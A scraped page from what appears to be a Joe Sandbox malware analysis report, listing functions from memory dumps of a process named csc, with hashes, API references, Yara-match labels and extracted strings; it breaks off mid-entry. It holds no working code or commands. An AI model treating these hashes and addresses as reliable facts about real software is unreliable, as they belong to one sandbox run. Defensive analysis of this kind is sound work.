Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 29e3b5114c1b48b4c9d99e20ab7a5b23fd6a41d322cc80d9b476ef18684f47ee
Instruction ID: 2d4323de2754290871ba241a1cde34461e809550e8487b773900b4d25b94a168
Opcode Fuzzy Hash: 29e3b5114c1b48b4c9d99e20ab7a5b23fd6a41d322cc80d9b476ef18684f47ee
Instruction Fuzzy Hash: 3890027220190402F10071584D5874B005D87D4302F95C011A1165555D866589516971

Function 059A2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 059A2FBA

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 19748fd034ac57bf0eed4969a51ee9b0a13fe49b5b4485ad4e851fc283fcce6b
Instruction ID: 2f24b04d3b3104ed0d3aac80a4e4622edfe816babb008c4755ca93084932c1ad
Opcode Fuzzy Hash: 19748fd034ac57bf0eed4969a51ee9b0a13fe49b5b4485ad4e851fc283fcce6b
Instruction Fuzzy Hash: 9990026260150042614071688D88946405DABE5211795C121A0999550D859989655A65

Function 059A2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 059A2FEA

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: feee0cd8d3dabb72255ad924de968225c25414311eecf4e939177f1905fdc50c
Instruction ID: 84d283b7666abd71e8c4e7d6b2301596a635d049e4aab133096e2a8be7a67d78
Opcode Fuzzy Hash: feee0cd8d3dabb72255ad924de968225c25414311eecf4e939177f1905fdc50c
Instruction Fuzzy Hash: 9E900262211D0042F20075684D58B47005D87D4303F95C115A0155554CC95589615921

Function 059A2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 059A2F3A

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4c6c83e534223ee460610425d8cc8f0db262f9aa1ecaac74fbbd6e8f57103bb0
Instruction ID: cea66f755c1a831b243986ea4dba7ddc9c514269cc90d6eb5e941a88b2c6209f
Opcode Fuzzy Hash: 4c6c83e534223ee460610425d8cc8f0db262f9aa1ecaac74fbbd6e8f57103bb0
Instruction Fuzzy Hash: 3A9002A234150442F10071584958B46005DC7E5301F95C015E1065554D8659CD526526

Function 059A2E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 059A2E8A

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0b7643574297d944b03c41d65858f6485a75c58a4f9d1f0b41d30ab947499480
Instruction ID: 9661b887439707d80bb90b5707c78d7e215f63e820c43e9b850e4e42e4d69d22
Opcode Fuzzy Hash: 0b7643574297d944b03c41d65858f6485a75c58a4f9d1f0b41d30ab947499480
Instruction Fuzzy Hash: FC90026260150502F10171584948656005E87D4241FD5C022A1025555ECA658A92A531

Function 059A2EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 059A2EAA

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bc2c23dba7156f68ca15dce661147d6eee72cf6b7f8693c585c1be343a900848
Instruction ID: d11ef2682175eb96b543fb56ee6235d016f04fcc46c50ab9df6ca1457c92a5fd
Opcode Fuzzy Hash: bc2c23dba7156f68ca15dce661147d6eee72cf6b7f8693c585c1be343a900848
Instruction Fuzzy Hash: 4D9002B220150402F14071584948786005D87D4301F95C011A5065554E86998ED56A65

Function 059A2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 059A2BFA

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5123fd84828979dc3c468f507d4917f769d03e27ac1a9d16879c218d3c7e4d18
Instruction ID: e1f4b816a43fdb039b2985756093c1667637fa7e720f2280cc916f11f4b0e171
Opcode Fuzzy Hash: 5123fd84828979dc3c468f507d4917f769d03e27ac1a9d16879c218d3c7e4d18
Instruction Fuzzy Hash: 2390027220150802F1807158494868A005D87D5301FD5C015A0026654DCA558B597BA1

Function 059A2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 059A2B6A

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f69223fbbcd781e4ce097eaf4aade1b688651fe679e38dbd51d89128b5ba7168
Instruction ID: 61d64d5b470571f3b5c4eb53ed861f58ce5ed9f97e2b50ab78e8b57344ada758
Opcode Fuzzy Hash: f69223fbbcd781e4ce097eaf4aade1b688651fe679e38dbd51d89128b5ba7168
Instruction Fuzzy Hash: 2E9002A220250003610571584958656405E87E4201B95C021E1015590DC56589916525

Function 059A2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 059A2ADA

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 86e6cc585beac83520b9a088025c35137d3200cad1a69c765299a2cee78b311d
Instruction ID: e0baa1e272e92131df40665f4b1dbff3086595467302ead8d62646d742611118
Opcode Fuzzy Hash: 86e6cc585beac83520b9a088025c35137d3200cad1a69c765299a2cee78b311d
Instruction Fuzzy Hash: FF900266211500032105B5580B48547009E87D9351395C021F1016550CD66189615521

Function 00409AB0 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_csc.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd94853dc0a5bd11354a55791940ee758e33ee4005cfa9d67f5cf96289ab4c5c
Instruction ID: d58fe8e4865b7a2b9ec26276515fb776abeb1cc765f7a728b76389d142a7d987
Opcode Fuzzy Hash: bd94853dc0a5bd11354a55791940ee758e33ee4005cfa9d67f5cf96289ab4c5c
Instruction Fuzzy Hash: 03213AB2D4020857CB25DA64AD52BFF73BCAB54314F04007FE949A3182F638BE498BA5

Function 0041A600 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A62D

Strings

6EA, xrefs: 0041A622, 0041A62C

Memory Dump Source

Source File: 00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_csc.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: 6EA
API String ID: 1279760036-1400015478
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 226561cf9c8a986873ffc081809f26ad69fcc4b20f94c9d7be20fabd3b8eb7db
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 24E012B1211208ABDB14EF99CC41EA777ACAF88664F118559BA085B242C630F911CAB0

Function 00408308 Relevance: 1.6, APIs: 1, Instructions: 57
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A

Memory Dump Source

Source File: 00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_csc.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: b5a212cec0f498636ea8b9674db46aa0e81e068a46898730b53075d8b0649237
Instruction ID: 66e82690fdcd5d4562f870e8e2ebb57786f52b425379a63051235869cbac9faa
Opcode Fuzzy Hash: b5a212cec0f498636ea8b9674db46aa0e81e068a46898730b53075d8b0649237
Instruction Fuzzy Hash: AD01F931A8031876E720A6659C43FFF7B6C5B45B54F04011DFF04BA1C2D6B9690586EA

Function 00408310 Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A

Memory Dump Source

Source File: 00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_csc.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 45924242aede014db28918b29a4ce2ef13cb4ce8d3c4182a16cec86e1105876c
Instruction ID: ee4297080f87ae1612e18f34f2b0feab3a9f48bf419a2075f585a901aa565cbe
Opcode Fuzzy Hash: 45924242aede014db28918b29a4ce2ef13cb4ce8d3c4182a16cec86e1105876c
Instruction Fuzzy Hash: C201A771A8032877E720A6959C43FFF776C5B40F54F05012EFF04BA1C2EAA8690546FA

Function 0041A673 Relevance: 1.6, APIs: 1, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6A8

Memory Dump Source

Source File: 00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_csc.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 1452dc28f1bd6f75773b2d86a6a17180036a7b03dbd3fc7f56debae945b1cfc0
Instruction ID: 41ec1874b9fb0594e2b39156cf3558d4be6319c578d99cc1f630dac95ca232ff
Opcode Fuzzy Hash: 1452dc28f1bd6f75773b2d86a6a17180036a7b03dbd3fc7f56debae945b1cfc0
Instruction Fuzzy Hash: 390113B2211108BBCB04DF99CC80DEB33ADAF8C714F118259FA0D97245C634E852CBA5

Function 0041A640 Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A66D

Memory Dump Source

Source File: 00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_csc.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: 3f65de21c9b51a2b7742007d51c6b1fad19b07b0b1b2c98d2bb582ee848745b4
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: 1EE046B1210208ABDB18EF99CC49EE777ACEF88764F018559FE085B242C630F911CAF0

Function 0041A7A0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A7D0

Memory Dump Source

Source File: 00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_csc.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: a195d06a74d451d332e2306e76e7c3aa502b90bd3f16d73f11471c4c6d802808
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 2FE01AB12102086BDB10DF49CC85EE737ADAF88654F018155BA0857241C934E8118BF5

Function 0041A680 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6A8

Memory Dump Source

Source File: 00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_csc.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: 026b6f0270740822b369349059f6971daea101c61a9fac8a7aff4918670f7806
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: C1D017726112187BD620EB99CC85FD777ACDF487A4F0180AABA1C6B242C531BA11CAE1

Function 059A2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 059A2C24

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bb0888ef769540797a7033e13a807d2d0a6b6287fb9d31a1a2d90e5c79b6c847
Instruction ID: 0e2ec110e1b7fe61045cc16e211617a63526984aedcbab95d0114d38d5b0f9e3
Opcode Fuzzy Hash: bb0888ef769540797a7033e13a807d2d0a6b6287fb9d31a1a2d90e5c79b6c847
Instruction Fuzzy Hash: 7AB09B739015C5C5FE11E7604B0CB17795977D0701F55C061D2030641E4778C1D1E5B5

Non-executed Functions

Function 05998620 Relevance: 19.0, Strings: 15, Instructions: 223COMMON

Download Yara Rule

Strings

Thread is in a state in which it cannot own a critical section, xrefs: 059D5543
Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 059D54CE
Critical section address., xrefs: 059D5502
Invalid debug info address of this critical section, xrefs: 059D54B6
Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 059D540A, 059D5496, 059D5519
8, xrefs: 059D52E3
corrupted critical section, xrefs: 059D54C2
Critical section debug info address, xrefs: 059D541F, 059D552E
double initialized or corrupted critical section, xrefs: 059D5508
ICw(JCw@4Cw@4Cw, xrefs: 059D5341, 059D534D
Thread identifier, xrefs: 059D553A
First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 059D54E2
Critical section address, xrefs: 059D5425, 059D54BC, 059D5534
undeleted critical section in freed memory, xrefs: 059D542B
Address of the debug info found in the active list., xrefs: 059D54AE, 059D54FA

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory$ICw(JCw@4Cw@4Cw
API String ID: 0-3651113152
Opcode ID: 6ac4e645f35725c0dcf3ab29b46c45c1590a76d1f87eab089010d18b5b2e8c7b
Instruction ID: 491fd86409f716135173c678423c7b6707d3b208dadabdbf7fa7df9abb94c888
Opcode Fuzzy Hash: 6ac4e645f35725c0dcf3ab29b46c45c1590a76d1f87eab089010d18b5b2e8c7b
Instruction Fuzzy Hash: 798158B1A40358EBDB20CF98C845FAEFBB9FB88714F118159E905BB640D371A941DBA0

Function 059F9179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON

Download Yara Rule

Strings

AppContainerNamedObjects, xrefs: 059F946E, 059F94D6
BaseNamedObjects, xrefs: 059F9477, 059F947C
\AppContainerNamedObjects, xrefs: 059F94AB, 059F94B9
%s\%u-%u-%u-%u, xrefs: 059F9422
Global\Session\%ld%s, xrefs: 059F94C5
\Sessions, xrefs: 059F9488
%s\%ld\%s, xrefs: 059F948D
\BaseNamedObjects, xrefs: 059F949E

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID: InitializeThunk
String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
API String ID: 2994545307-3063724069
Opcode ID: 428257bc441ca9709763c21a586d044c9fee5b9f2990ecf3a2572cba7ce6f3f6
Instruction ID: e2d2eb767467821edea773e6b6e9e3409f162af9dda41d1ad566e03d76dccfcb
Opcode Fuzzy Hash: 428257bc441ca9709763c21a586d044c9fee5b9f2990ecf3a2572cba7ce6f3f6
Instruction Fuzzy Hash: 5FD1DFB2908315AFD721DB54C844F6BB7EDAFC4B14F040A29FB84A7150E770E9498BE2

Function 0595D08D Relevance: 10.2, Strings: 8, Instructions: 249COMMON

Download Yara Rule

Strings

Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 0595D262
@, xrefs: 0595D313
\Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 0595D0CF
@, xrefs: 0595D2AF
Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 0595D146
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 0595D2C3
Control Panel\Desktop\LanguageConfiguration, xrefs: 0595D196
@, xrefs: 0595D0FD

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
API String ID: 0-1356375266
Opcode ID: f4b8a6f2c1bd74575cfbc1298eb3eab12a56ded94b3c1ddf384c00c5d4006521
Instruction ID: 09661b6ddddcd33e612ea4004d2b7e54f8c6271e3d18617ebff80a2b35a1ed02
Opcode Fuzzy Hash: f4b8a6f2c1bd74575cfbc1298eb3eab12a56ded94b3c1ddf384c00c5d4006521
Instruction Fuzzy Hash: A6A161719083459FE721DF15C544BABB7E9BFC4725F40492EF98896240E774EA08CBA3

Function 0595F172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON

Download Yara Rule

Strings

(LONG)FreeEntry->Size > 1, xrefs: 059BE291
(!TrailingUCR), xrefs: 059BE3A9
(UCRBlock != NULL), xrefs: 059BDF6F
HEAP[%wZ]: , xrefs: 059BDF57, 059BE09B, 059BE279, 059BE391
HEAP: , xrefs: 059BDF64, 059BE0A8, 059BE286, 059BE39E
((LONG)FreeEntry->Size > 1), xrefs: 059BE0B3

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
API String ID: 0-523794902
Opcode ID: 641e1b48c1f84f3b4db23edadfef8da8bb332b734ccc092b4ca09587ea46a169
Instruction ID: 8292b68575d844ab3eeb958832900e46c324255507a518138248138e994d7364
Opcode Fuzzy Hash: 641e1b48c1f84f3b4db23edadfef8da8bb332b734ccc092b4ca09587ea46a169
Instruction Fuzzy Hash: 7242E3B12083819FE715CF28C588BAABBEAFF84324F14496DE8868B351D734E945CB51

Function 0597B1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON

Download Yara Rule

Strings

DLL %wZ was redirected to %wZ by %s, xrefs: 059C83FC
LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx, xrefs: 059C84D0
API set, xrefs: 059C83F4, 059C83F9
minkernel\ntdll\ldrutil.c, xrefs: 059C840D, 059C84E1
SxS, xrefs: 059C83ED
LdrpPreprocessDllName, xrefs: 059C8403, 059C84D7

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
API String ID: 0-122214566
Opcode ID: 36b62c1b6da426d897eab066233ccd43e2c128e6451d10bd367e5d35f2181086
Instruction ID: 9bd5d275b375b1ca14c93a6cfbefac5202b66c6515fb6a2afca2c8db92f2006a
Opcode Fuzzy Hash: 36b62c1b6da426d897eab066233ccd43e2c128e6451d10bd367e5d35f2181086
Instruction Fuzzy Hash: 6EC12A71B0521DABDF24DB64C895B7EBBABFF85300F1444AAE8069B290FB749D44C391

Function 05A0F525 Relevance: 7.7, Strings: 6, Instructions: 231COMMON

Download Yara Rule

Strings

Invalid allocation size - %Ix (exceeded %Ix), xrefs: 05A0F809
Just allocated block at %p for 0x%Ix bytes with tag %ws, xrefs: 05A0F7BE
HEAP[%wZ]: , xrefs: 05A0F6E7, 05A0F794, 05A0F7EB
HEAP: , xrefs: 05A0F6F4, 05A0F7A1, 05A0F7F8
RtlAllocateHeap, xrefs: 05A0F56D
Just allocated block at %p for %Ix bytes, xrefs: 05A0F708

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

